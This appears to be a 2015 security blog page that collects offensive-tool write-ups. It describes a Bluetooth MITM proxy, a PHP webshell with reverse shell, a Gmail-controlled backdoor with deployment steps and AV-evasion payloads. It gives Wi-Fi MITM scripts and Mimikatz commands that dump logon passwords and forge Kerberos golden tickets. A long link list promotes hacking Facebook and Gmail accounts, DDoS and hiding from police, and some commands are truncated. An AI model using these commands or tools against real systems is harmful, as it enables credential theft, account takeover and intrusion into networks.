  • Need at least 1 Bluetooth card (either USB or internal).
  • Need to be running Linux, another *nix, or OS X.
  • BlueZ
For a debian system, run

sudo apt-get install bluez bluez-utils bluez-tools libbluetooth-dev python-dev


sudo python install


To run a simple MiTM or proxy on two devices, run

btproxy <master-bt-mac-address> <slave-bt-mac-address>
Run btproxy to get a list of command arguments.


# This will connect to the slave 40:14:33:66:CC:FF device and 
# wait for a connection from the master F1:64:F3:31:67:88 device
btproxy F1:64:F3:31:67:88 40:14:33:66:CC:FF
The master is typically the phone and the slave MAC address is typically the other peripheral device (smart watch, headphones, keyboard, OBD2 dongle, etc.).
The master is the device that sends the connection request and the slave is the device listening for something to connect to it.
After the proxy connects to the slave device and the master connects to the proxy device, you will be able to see traffic and modify it.

How to find the BT MAC Address?

For a phone you can usually look it up in the settings. The most robust way is to put the device in advertising mode and scan for it.
There are two ways to scan for devices: scanning and inquiring. hcitool can be used to do this:

hcitool scan
hcitool inq
To get a list of services on a device:

sdptool records <bt-address>


Some devices may restrict connecting based on the name, class, or address of another bluetooth device.
So the program will lookup those three properties of the target devices to be proxied, and then clone them onto the proxying adapter(s).

Then it will first try connecting to the slave device from the cloned master adaptor. It will make a socket for each service hosted by the slave and relay traffic for each one independently.
After the slave is connected, the cloned slave adaptor will be set to be listening for a connection from the master. At this point, the real master device should connect to the adaptor. After the master connects, the proxied connection is complete.

Using only one adapter

This program uses either 1 or 2 Bluetooth adapters. If you use one adapter, then only the slave device will be cloned. Both devices will be cloned if 2 adapters are used; this might be necessary for more restrictive Bluetooth devices.


Sep 8, 2015

Tools: b374k - PHP Webshell with handy features

This PHP shell is a useful tool for a system or web administrator to do remote management without using cPanel or connecting over SSH, FTP, etc. All actions take place within a web browser.
Features :
  • File manager (view, edit, rename, delete, upload, download, archiver, etc)
  • Search file, file content, folder (also using regex)
  • Command execution
  • Script execution (php, perl, python, ruby, java, node.js, c)
  • Give you shell via bind/reverse shell connect
  • Simple packet crafter
  • Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more using ODBC or PDO)
  • SQL Explorer
  • Process list/Task manager
  • Send mail with attachment (you can attach local file on server)
  • String conversion
  • All of that only in 1 file, no installation needed
  • Support PHP > 4.3.3 and PHP 5


Tools: Gcat – Python Backdoor Using Gmail For Command & Control


A stealthy Python based backdoor that uses Gmail as a command and control server


For this to work you need:
  • A Gmail account (Use a dedicated account! Do not use your personal one!)
  • Turn on "Allow less secure apps" under the security settings of the account
This repo contains two files:
  • a script that's used to enumerate and issue commands to available clients
  • the actual backdoor to deploy
In both files, edit the gmail_user and gmail_pwd variables with the username and password of the account you previously setup.
You're probably going to want to compile the backdoor into an executable using PyInstaller.


Sep 7, 2015

Tools: Next-gen BurpSuite penetration testing tool: BurpKit

BurpKit is a BurpSuite plugin which helps in assessing complex web apps that render the contents of their pages dynamically. As part of its rich feature set, BurpKit provides a bi-directional JavaScript bridge API which allows users to quickly create BurpSuite plugins which can interact directly with the DOM and Burp’s extender API at the same time. This permits BurpSuite plugin developers to run their web application testing logic directly within the DOM itself whilst taking advantage of BurpSuite’s other features as well!


Aug 26, 2015

Tools: Static Code Analysis for Smali

Dynamic program analysis will give you a pretty good overview of your application's activities and general behaviour. However, sometimes you'll want to analyse your application without running it. You'll want to look at its components, analyse how they interact and how data is tainted from one point to another. This was the major factor driving the development of smalisca. There are indeed some good reasons for a static code analysis before the dynamic one. Before interacting with the application I like to know how the application has been built, whether there is any API, and generate all sorts of call flow graphs. In fact graphs have been very important to me since they visualise things. Instead of jumping from file to file, from class to class, I just look at the graphs.
While graph building has been an important reason for me to code such a tool, smalisca has some other neat features you should read about.


Aug 25, 2015

Tools: dnSpy - .NET decompiler

dnSpy is a .NET assembly editor, decompiler, and debugger forked from ILSpy.


Aug 24, 2015

Howto: Install Metasploit 4.0.5 on Ubuntu 14.04

1. Install and update some software
$ apt-get update && apt-get upgrade -y
$ apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev ruby-dev

2. Get Metasploit
$ git clone

3. Install Ruby and bundler
$ cd metasploit-framework/
$ apt-get install ruby ruby-dev
$ gem install bundler

4. Install rvm
$ gpg --keyserver hkp:// --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
$ \curl -sSL | bash -s stable --ruby

5. Use Ruby 2.2.3
$ source /usr/local/rvm/scripts/rvm
$ rvm install ruby-2.2.3
$ rvm use --default  2.2.3

6. Install the bundle
$ gem install bundle bundler
$ gem install ffi -v '1.9.8'
$ gem install nokogiri -v ''
$ gem install metasploit-concern -v '1.0.0'
$ bundle install

7. Done.

Aug 23, 2015

Tools: Exe2Image

A simple utility to convert EXE files to JPEG images and vice versa.


Howto: Install VMware Tools in Kali Linux 2

1. Update your app and repository list
$ apt-get update && apt-get upgrade -y

2. Install Linux kernel header
$ apt-get install -y linux-headers-$(uname -r)

3. Install VMware Tools
- mount the tools ISO by clicking Install VMware Tools in the VM menu
- copy the file VMwareTools-9.9.3-2759765.tar.gz to your Kali
$ tar -xf VMwareTools-9.9.3-2759765.tar.gz
$ cd vmware-tools-distrib
$ perl -d

Aug 21, 2015

Tools: CrackMapExec - pentesting Windows/Active Directory tool

CrackMapExec is your one-stop-shop for pentesting Windows/Active Directory environments!
From enumerating logged on users and spidering SMB shares to executing psexec style attacks and auto-injecting Mimikatz into memory using Powershell!
The biggest improvements over comparable tools are:
  • Pure Python script, no external tools required
  • Fully concurrent threading
  • Uses ONLY native WinAPI calls for discovering sessions, users, dumping SAM hashes etc...
  • Opsec safe (no binaries are uploaded to dump clear-text credentials)
Requires the impacket, gevent and netaddr Python libraries


Tools: BinNavi - binary analysis IDE

BinNavi is a binary analysis IDE - an environment that allows users to inspect, navigate, edit, and annotate control-flow-graphs of disassembled code, do the same for the callgraph of the executable, collect and combine execution traces, and generally keep track of analysis results among a group of analysts.


CheatSheet: LFCS (Linux Foundation Certified System Admin)

Domain                       Task                                               Commands / files
---------------------------  -------------------------------------------------  -----------------------------------------------
Command-line                 Editing text files on the command line             vim, nano
                             Manipulating text files from the command line      cat, grep, tr, cut, awk, head, tail, echo
Filesystem & storage         Archiving and compressing files and directories    tar, gzip, xz, gunzip, bzip2
                             Assembling partitions as LVM devices               pvcreate, vgcreate, lvcreate, lvextend
                             Configuring swap partitions                        mkswap, swapon, swapoff
                             File attributes                                    chmod, chattr, chown
                             Finding files on the filesystem                    find, grep
                             Formatting filesystems                             mkfs series
                             Mounting filesystems automatically at boot time    /etc/fstab
                             Mounting networked filesystems                     mount, /etc/fstab entries, nfs-client package
                             Partitioning storage devices                       fdisk
                             Troubleshooting filesystem issues                  fsck
Local system administration  Creating backups                                   cp, rsync
                             Creating local user groups                         useradd, adduser, groupadd, addgroup
                             Managing file permissions                          chmod, chattr, chown
                             Managing fstab entries                             /etc/fstab
                             Managing local user accounts                       usermod, passwd
                             Managing the startup process and related services  /etc/rc.local, /etc/rc*.d
                             Managing user accounts                             usermod, passwd
                             Managing user account attributes                   usermod, passwd
                             Managing user processes                            /etc/security/limits.conf, ulimit
                             Restoring backed up data                           tar, gzip, xz, gunzip, bzip2
                             Setting file permissions and ownership             chmod, chattr, chown
Local security               Accessing the root account                         su, sudo
                             Using sudo to manage access to the root account    sudo
Shell scripting              Basic bash shell scripting                         if/else, expr, while, for, ${#string}, ${name:0:n}, $0, $1, $2, $#, $*
Software management          Installing software packages                       apt-get, dpkg, rpm, yum

Tools: Whonix - Anonymous OS

Whonix is an operating system focused on anonymity, privacy and security. It's based on the Tor anonymity network[1], Debian GNU/Linux[2] and security by isolation. DNS leaks are impossible, and not even malware with root privileges can find out the user's real IP.
Whonix consists of two parts: One solely runs Tor and acts as a gateway, which we call Whonix-Gateway. The other, which we call Whonix-Workstation, is on a completely isolated network. Only connections through Tor are possible.


Aug 18, 2015

Howto: Set up a MITM lab on a Wi-Fi network (by Hackers Online Club)


Setting up a SNIFFLAB
Scripts to create your own MITM'ing, packet sniffing WiFi access point.

Firewall rules on DD-WRT router to send traffic to MITM proxy box

Make sure the network interface (vlan1 here) is correct.

# Traffic coming from the proxy box itself is accepted unmarked so it is not looped back to it
iptables -t mangle -A PREROUTING -j ACCEPT -p tcp -m multiport --dports 80,443 -s $PROXYIP
# Every other HTTP/HTTPS connection gets fwmark 3
iptables -t mangle -A PREROUTING -j MARK --set-mark 3 -p tcp -m multiport --dports 80,443
# Marked packets are looked up in routing table 2, whose default route is the proxy box
ip rule add fwmark 3 table 2
ip route add default via $PROXYIP dev vlan1 table 2

PCAP machine scripts


# /etc/network/interfaces on the PCAP machine (file name inferred from the Debian convention)
auto lo
iface lo inet loopback
# the two capture ports get no address; the boot script below brings them up and sets promiscuous mode
iface eth0 inet manual
iface eth1 inet manual
# wlan0 is the uplink used to reach the box; Wi-Fi credentials live in the wpa_supplicant config
allow-hotplug wlan0
iface wlan0 inet dhcp
wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp

# bond0 joins the two capture ports; bond-mode 3 is the broadcast mode
auto bond0
iface bond0 inet dhcp
bond-mode 3
bond-miimon 100
slaves eth0 eth1

# /etc/wpa_supplicant/wpa_supplicant.conf (the file referenced by wpa-conf above)
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev


Getting the network running correctly on boot


#!/bin/sh
### BEGIN INIT INFO
# Provides:
# Short-Description: Ensure WiFi as well as Ethernet interfaces are up
# Description:
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Required-Start: $remote_fs $syslog
# Required-Stop: $remote_fs $syslog
### END INIT INFO
# Stop ifplugd from managing eth0, bring every interface up, then put both
# capture ports into promiscuous mode so the bond sees all frames on the wire.
sudo ifplugd eth0 --kill
sudo ifup wlan0
sudo ifup eth0
sudo ifup eth1
sudo ifconfig eth1 promisc
sudo ifconfig eth0 promisc
exit 0

Start capturing packets on startup -- create a sniffer service


# Upstart job: start the capture once the multi-user runlevels are reached
start on runlevel [2345]
stop on runlevel [016]

script
    cd /home/pi/snifflab
    # the capture script name is missing from the source; it is run against the bond0 interface
    exec python -i bond0 -s 100 -t 1200
end script

MITM proxy service


# Upstart job: redirect HTTP/HTTPS arriving on em1 to the transparent proxy port, then start mitmdump
start on filesystem

script
    sudo iptables -A PREROUTING -t nat -i em1 -p tcp -m multiport --dports 80,443 -j REDIRECT --to-port 4567
    # SSLKEYLOGFILE is assumed to be exported in the job's environment (it is not set in this snippet)
    echo "MITM Keys being logged here: $SSLKEYLOGFILE"
    exec mitmdump -T --host --conf=/etc/mitmproxy/common.conf
end script

Script to backup pcaps to local machine


#!/bin/sh
# remote_server, pcap_dir, local_dir and keylogfile are expected to be set in the environment
rsync -a "$remote_server":$pcap_dir $local_dir
scp "$remote_server":$keylogfile $local_dir
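The pcaps and the SSLKEYLOGFILE that this script copies back are only useful together: Wireshark needs a CLIENT_RANDOM line in the key log for every TLS session it is to decrypt. The following Python is an added example (not part of the snifflab scripts) that parses the NSS key log format mitmdump writes, flags malformed lines, and reports which captured sessions have a key; the key log content and the client randoms are constructed, and extracting client randoms from a real pcap is assumed to be done with a tool such as tshark.

```python
import re

# Constructed sample of the NSS key log written by mitmdump when SSLKEYLOGFILE is set.
# Real files hold one "CLIENT_RANDOM <32-byte client random> <48-byte master secret>"
# line per TLS session (hex-encoded); all values below are made up.
SAMPLE_KEYLOG = "\n".join([
    "# SSL/TLS secrets log file, generated by mitmproxy (constructed sample)",
    "CLIENT_RANDOM " + "11" * 32 + " " + "aa" * 48,
    "CLIENT_RANDOM " + "22" * 32 + " " + "bb" * 48,
    "CLIENT_RANDOM " + "33" * 32 + " " + "cc" * 48,
    "CLIENT_RANDOM deadbeef tooshort",                        # malformed: field lengths are wrong
    "RSA 0123456789abcdef0123456789abcdef " + "dd" * 48,    # RSA premaster format, not handled here
])

# Constructed client randoms, as they would be pulled from the ClientHello of each
# TLS session in the backed-up pcaps (e.g. with tshark).
OBSERVED_CLIENT_RANDOMS = ["11" * 32, "33" * 32, "99" * 32]

CLIENT_RANDOM_RE = re.compile(r"^CLIENT_RANDOM ([0-9a-fA-F]{64}) ([0-9a-fA-F]{96})$")


def parse_keylog(text):
    """Return ({client_random: master_secret}, [line numbers of malformed CLIENT_RANDOM lines])."""
    secrets, malformed = {}, []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                      # blank line or comment
        match = CLIENT_RANDOM_RE.match(line)
        if match:
            secrets[match.group(1).lower()] = match.group(2).lower()
        elif line.startswith("CLIENT_RANDOM"):
            malformed.append(lineno)      # right label, wrong field lengths: unusable for decryption
        # other labels (RSA, TLS 1.3 *_TRAFFIC_SECRET lines) are ignored by this example
    return secrets, malformed


def decryptable_sessions(secrets, client_randoms):
    """Split captured sessions into those with a logged master secret and those without."""
    have_key = [cr for cr in client_randoms if cr.lower() in secrets]
    missing_key = [cr for cr in client_randoms if cr.lower() not in secrets]
    return have_key, missing_key


if __name__ == "__main__":
    secrets, malformed = parse_keylog(SAMPLE_KEYLOG)
    have_key, missing_key = decryptable_sessions(secrets, OBSERVED_CLIENT_RANDOMS)
    print("usable keys: %d, malformed lines: %s" % (len(secrets), malformed))
    print("sessions decryptable: %d, without key: %d" % (len(have_key), len(missing_key)))
```

A session without a key usually means the client connected before mitmdump started or bypassed the redirect, which is worth knowing before trusting the capture.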

Tools: OWASP ZCR Shellcoder

OWASP ZCR Shellcoder is open source software written in Python that lets you generate customized shellcodes for the listed operating systems. It runs on Windows, Linux/Unix, OS X and other operating systems under Python 2.7.x.


Aug 16, 2015

Tools: Exploit Privilege Escalation in Mac OS X 10.10.5

xnu local privilege escalation via cve-2015-???? & cve-2015-???? for 10.10.5, 0day at the time | poc||gtfo


Howto: Install Java on Kali 2.0

1. Download java from

2. Extract the archive
tar xzvf jdk-8u51-linux-x64.tar.gz

3. Move it to /opt
mv jdk1.8.0_51/ /opt/

4. Register the new Java binaries with update-alternatives
update-alternatives --install /usr/bin/java java /opt/jdk1.8.0_51/bin/java 1
update-alternatives --install /usr/bin/javac javac /opt/jdk1.8.0_51/bin/javac 1
update-alternatives --install /usr/lib/mozilla/plugins/ /opt/jdk1.8.0_51/jre/lib/amd64/ 1

Howto: Using Mimikatz on Windows 8.1 by Carnal0wnage


1. Dump logon passwords
mimikatz # sekurlsa::logonpasswords
2. Dump Kerberos tickets
mimikatz # sekurlsa::tickets /export
3. Inject an exported ticket into the current session (pass-the-ticket)
mimikatz # kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi

4. Forge a Kerberos golden ticket
mimikatz # kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi

mimikatz # kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080

Howto: Fix and use Armitage in Kali2


curl > armitage150813.tgz
tar xzf armitage150813.tgz
cd armitage
msfdb init 

Aug 13, 2015

Tools: Metasploit AV Evasion

Metasploit payload generator that avoids most Anti-Virus products.
Released as open source by NCC Group Plc -
Developed by Daniel Compton, daniel dot compton at nccgroup dot com


Aug 12, 2015

Tools: CredCrack - A fast and stealthy credential harvester

CredCrack is a fast and stealthy credential harvester. It exfiltrates credentials in memory and in the clear without ever touching disk. Upon obtaining credentials, CredCrack will parse and output the credentials while identifying any domain administrators obtained. CredCrack also comes with the ability to list and enumerate share access and yes, it is threaded!  CredCrack has been tested and runs with the tools found natively in Kali Linux. CredCrack solely relies on having PowerSploit's "Invoke-Mimikatz.ps1" under the /var/www directory. Download Invoke-Mimikatz Here


Aug 11, 2015

Tools: pcap-burp - Pcap importer for Burp

This project provides a Burp Suite extension for importing and passively scanning Pcap/Pcapng files with Burp. It can be used in cases where an HTTP client does not support proxying but it would be useful to scan, inspect or replay the HTTP traffic using Burp.


Aug 10, 2015

Howto: create a Python script to post to Facebook

1. Create a Facebook user account

2. Create a Facebook application (Advanced Setup)

3. Set the application name and namespace

4. Note the App ID, API version and App Secret

5. Get an access token, choosing the permissions the script should have

6. Go to My Apps -> your application -> Status & Review -> New Submission and request the specific permissions you need

7. Upgrade the Python requests module
# pip install --upgrade requests
# pip-2.7 install --upgrade requests

8. Use the code
# coding: utf-8
# Requires the facebook-sdk package (imported as "facebook") and requests

import facebook
import requests

oauth_access_token = 'XXXXXXXXXXXXXXXXXXXX'   # the access token obtained in step 5
graph = facebook.GraphAPI(oauth_access_token)

###### Fetch the friends list of the account
profile = graph.get_object("me")
friends = graph.get_connections("me", "friends")
friend_list = [friend['name'] for friend in friends['data']]
print(friend_list)

groups = graph.get_object("me/groups")

###### Post to the wall
#graph.put_wall_post(message="Hello World")


Aug 6, 2015

Tools: Noriben Malware Analysis Sandbox

Noriben is a Python-based script that works in conjunction with Sysinternals Procmon to automatically collect, analyze, and report on runtime indicators of malware. In a nutshell, it allows you to run your malware, hit a keypress, and get a simple text report of the sample's activities.
Noriben allows you to not only run malware similar to a sandbox, but to also log system-wide events while you manually run malware in ways particular to making it run. For example, it can listen as you run malware that requires varying command line options. Or, watch the system as you step through malware in a debugger.
Noriben only requires Sysinternals procmon.exe (or procmon64.exe) to operate. It requires no pre-filtering (though it would greatly help) as it contains numerous white list items to reduce unwanted noise from system activity.


Tools: toxy - hackable HTTP proxy

toxy is a hackable HTTP proxy to simulate failure scenarios and unexpected conditions, built for node.js/io.js.
It was mainly designed for fuzz/evil testing purposes, and is particularly useful for covering the fault tolerance and resiliency capabilities of a system, typically in service-oriented distributed architectures, where toxy may act as an intermediate proxy between services.
toxy allows you to plug in poisons, optionally filtered by rules, which basically can intercept and alter the HTTP flow as you want, performing multiple evil actions in the middle of that process, such as limiting the bandwidth, delaying TCP packets, injecting network jitter latency or replying with a custom error or status code.
toxy is compatible with connect/express, and it was built on top of rocky, a full-featured, middleware-oriented HTTP proxy.


Link Resources For Learning Security

Good reads
How to prepare SQL Injection attack with SQLMap on Kali Linux
How to hack Wi-Fi using Wifite
How to detect XSS vulnerability attack on any website using XSSER on Kali Linux
How to prepare SYN Attack using Kali Linux
How to prepare DDOS attack on a website using Kali Linux
4 ways to hack Facebook account
4 ways hacking Gmail account
How to update rules in SNORT
How to hack Facebook account using SE-Toolkit on Kali Linux
How to find information about someone using Maltego
How to gather information about someone using Backtrack
Gathering information using NMap
How to install firewall on Linux machine
How to configure firewall
Video tutorial showing a practical application of the Parameter Delimiter attack
Step-By-Step SQL Injection
How to use SQLMap tool
Tutorial about Search Engine Dorking
RFI Tutorial
Text tutorial about preparing Man in the Middle attack using Ettercap tool
How to prepare DDOS attack on a website using Kali Linux
How to detect XSS vulnerability attack on any website using XSSER on Kali Linux
How to prepare SQL Injection attack with SQLMap on Kali Linux
Using HPing3 tool in Kali Linux
How to use THC-IPv6 toolset
How to use Ping tool in Linux
Tutorial about using NMap port scanner
Usage of Brutus AET2
How to sniff passwords using Cain
Sniffing logins and passwords
Graphical view on the network using Etherape
Videotutorial that shows how to use NMap on Kali Linux
How to do ARP Poisoning attack using Ettercap
How to prepare Man in the Middle attack using Ettercap
How to see network usage with Ettercap
Description of various Network Interfaces
Tutorial about Ping tool usage
How to prepare SYN Attack using Kali Linux
Videotutorial that shows how to hack WPA & WPA2 password using Aircrack-ng software
How to crack Wi-Fi protected by WEP using Aircrack-ng
How to hack Wi-Fi protected by WPA/WPA2 using Aircrack-ng
How to prepare EvilTwin attack on Kali Linux
How to crack WEP faster in Kali Linux
How to hack WEP protected Wi-Fi with Aircrack-ng
How to hack WPA/WPA2 Wi-Fi protected network using Reaver
How to hack Wi-Fi using Wifite
How ATM can be hacked with just a SMS
Linux Security Secrets and Solutions
Over 70 recipes to help you master Kali Linux for effective penetration testing
A few attacks on an older version of the Windows operating system
Or how to open an .exe file thinking it is a .jpg
How to reset Windows admin password using Linux :)
How to hack Win7 using backdoor on Kali Linux
The guide shows how to break into a computer running Windows.
How to exploit Windows7 machine using Metasploit
Some ways to exploit Windows7 & 8 using Backtrack
Video tutorial showing the use of dnsdict6 to perform DNS enumeration
How to enumerate DNS using DNSMap on Kali Linux
How to crack MD5 hash using Perl script on Kali Linux
How to hack remote computer if you know an IP address ;)
How to secure hard drive with TrueCrypt
How to create encrypted hidden volumes in TrueCrypt
Introduction to Public Key Cryptography
The video shows how to discover GG (Gadu-Gadu) numbers that have a given password set
How to admin an IRC channel :)
How to IRC anonymously with XChat+Tor
How to make your own programming language based on Ruby. Part II - creating a language compiled to pseudocode
How to use the Registry pattern in PHP
How to install VirtualBox on Windows
How to install Guest Additions in Virtualbox
The tutorial covers Bluetooth on Android :)
The tutorial covers the basics of 2D graphics on Android.
A dozen or so hacking terms that everyone starting out with hacking should know
How to install Ubuntu
How to configure Ubuntu
Installing Tor for Windows
How to clean up traces in Windows
How to shred free space
How to secure your computer and surf completely anonymous
How to configure Tor Only Environment
How to protect yourself from police
How to install IRC client on Linux machine
How to install Torchat
How to configure SNORT
Daily usage of Tor
Basic usage of Wireshark
Usage of Wireshark's filters
How to configure BASE to work with SNORT
Using BleedingSNORT rules in SNORT
Some things about Port Mirroring in SNORT
How to use TCPDump tool
How to use HarVester tool in Kali Linux
Explanation of the meaning of BIOS text messages
How to turn your smartphone into computer webcam
Conclusion about Black Hat Style tutorials
Good linux torrent clients
Look into Rtorrent as well
20 things to do after installing Kali Linux
Coding challenges and resources that will make you an expert coder
How to compile a Linux program from source
Magnet links to VERRYYY big files with libraries of information
Linux eBooks Collection [PDF]
Narzew tutorials
Kali Linux Cookbook
Over 70 recipes to help you master Kali Linux for effective penetration testing
Black Hat Style - Tor Only Environment
How to configure Tor Only Environment
Hacking Facebook with SET Phishing
How to hack Facebook account using SE-Toolkit on Kali Linux
Search Engine Dorking
Tutorial about Search Engine Dorking
Using XChat with Tor
How to IRC anonymously with XChat+Tor
Attacks on Windows 95/98
A few attacks on an older version of the Windows operating system
Black Hat Style - Tor Daily Usage
Daily usage of Tor
Black Hat Style - Installing Firewall
How to install firewall on Linux machine
Hacking Facebook account
4 ways to hack Facebook account
Black Hat Style - Installing IRC client on Linux machine
How to install IRC client on Linux machine
BIOS text messages
Explanation of the meaning of BIOS text messages
SQLMap For Dummies
How to use SQLMap tool
Hacking Linux Exposed - 3rd Edition
Linux Security Secrets and Solutions
Hacking basics
A dozen or so hacking terms that everyone starting out with hacking should know
Black Hat Style - Firewall Configuration
How to configure firewall
Hacking remote computer with IP address
How to hack remote computer if you know an IP address ;)
Black Hat Style - Securing Hard Drive
How to secure hard drive with TrueCrypt
Ping Tutorial
How to use Ping tool in Linux
Your own programming language, part 2
How to make your own programming language based on Ruby. Part II - creating a language compiled to pseudocode
Black Hat Style - Shredding Free Space
How to shred free space
NMap - A Stealth Port Scanner
Tutorial about using NMap port scanner
Black Hat Style - Tor for Windows
Installing Tor for Windows
Black Hat Style - Installing Torchat
How to install Torchat
Black Hat Style - How to secure your computer and surf anonymously
How to secure your computer and surf completely anonymous
Sniffing logins and passwords
Sniffing logins and passwords
Hacking Gmail
4 ways hacking Gmail account
Black Hat Style - Conclusion
Conclusion about Black Hat Style tutorials
IRC Channel Operator Tutorial
How to admin an IRC channel :)
Remote File Inclusion
RFI Tutorial
Black Hat Style - Ubuntu Configuration
How to configure Ubuntu
Black Hat Style - Setting up TrueCrypt, Encrypted Hidden Volumes
How to create encrypted hidden volumes in TrueCrypt
The Parameter Delimiter attack in practice
Video tutorial showing a practical application of the Parameter Delimiter attack
Black Hat Style - Installing VirtualBox on Windows
How to install VirtualBox on Windows
SQL Injection Step-By-Step
Step-By-Step SQL Injection
DNS Enumeration in practice
Video tutorial showing the use of dnsdict6 to perform DNS enumeration
HPing3 Tutorial
Using HPing3 tool in Kali Linux
Black Hat Style - HD CleanUp Windows
How to clean up traces in Windows
Resetting Windows Administrator Password
How to reset Windows admin password using Linux :)
Brutus AET2
Usage of Brutus AET2
Sniffing Passwords using Cain
How to sniff passwords using Cain
THC-IPv6 Tutorial
How to use THC-IPv6 toolset
Black Hat Style - Installing Ubuntu
How to install Ubuntu
DNS Enumeration using DNSMap
How to enumerate DNS using DNSMap on Kali Linux
Hiding file extensions
Or how to open an .exe file thinking it is a .jpg
Your own programming language, part 1
How to make your own programming language based on Ruby. Part I - creating an interpreted language
Black Hat Style - Installing VirtualBox Guest Additions
How to install Guest Additions in Virtualbox
Anti-Police Tutorial
How to protect yourself from police